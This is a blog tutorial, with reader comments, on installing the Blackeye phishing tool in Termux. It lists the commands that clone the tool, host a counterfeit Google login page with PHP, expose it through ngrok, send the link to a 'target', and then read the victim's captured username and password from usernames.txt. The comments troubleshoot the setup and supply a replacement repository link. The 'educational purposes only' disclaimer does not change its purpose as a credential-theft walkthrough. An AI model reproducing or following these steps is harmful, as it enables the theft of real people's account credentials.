How to install Blackeye tool in Termux

How to install blackeye tool in termux

Hello Guys, Today i will tell you how to install blackeye tool in termux . I applied a different method because sometime it show many problem. 


Installation (Termux)

First Open your Termux Application If Playstore termux is not working then click here
Then Type,

$ apt update && apt upgrade
$ pkg install python -y
$ pkg install git curl php openssh wget python2
$ git clone https://github.com/thelinuxchoice/blackeye.git
$ ls 
$ cd blackeye
$ chmod +x *
$ cd sites
$ ls
$ cd google (Choose your   page In my case i choose Gmail)
$ php -S localhost:1234  (You can put a different Number )

Then Open a new session & Remember You have ngrok installed in your termux

Then type,

$ cd
$ ls
$ ./ngrok http 1234 (Remember the localhost's 4 digit number and it should be same & Turn on your hotspot)

Then copy the Generated (Ngrok) Forwarding link and send this to the target 
After victim login the link press ctrl + c to turn off the ngrok & go to the first session and press ctrl +c ....Then go to the Google directory 
Type,
$ cd 
$ cd blackeye
$ cd sites
$ cd google
$ ls 
TO SEE THE VICTIM USERNAME & PASSWORD 
Type,
$ cat usernames.txt



*NOTE:

    This Tool is for educational purposes only!
     I'm not responsible For your actions!





Post a Comment

13 Comments

  1. If i put the git clone https://github.com/thelinuxchoice/blackeye.git its says username and password what is that meaning?

    ReplyDelete
    Replies
    1. You can Enter This Updated Link And Try again https://github.com/An0nUD4Y/blackeye.git

      Delete
  2. Replies
    1. This tool was updated .You can Enter This Updated Link And Try again https://github.com/An0nUD4Y/blackeye.git

      Delete
  3. This tool was updated .You can Enter This Updated Link And Try again https://github.com/An0nUD4Y/blackeye.git

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. I cant clone to blackeye username and pass?

    ReplyDelete
  6. When I put apt update && apt upgrade, it doesn't respond. So what should I do?

    ReplyDelete
    Replies
    1. o apt upgrade não funciona mais, coloca apt update && pkg upgrade

      Delete
  7. 1st

    Put the code like
    Apt-get upgrade
    Then
    Apt-get update .

    ReplyDelete
  8. It doesn't show the link am supposed to send.. please what will i do

    ReplyDelete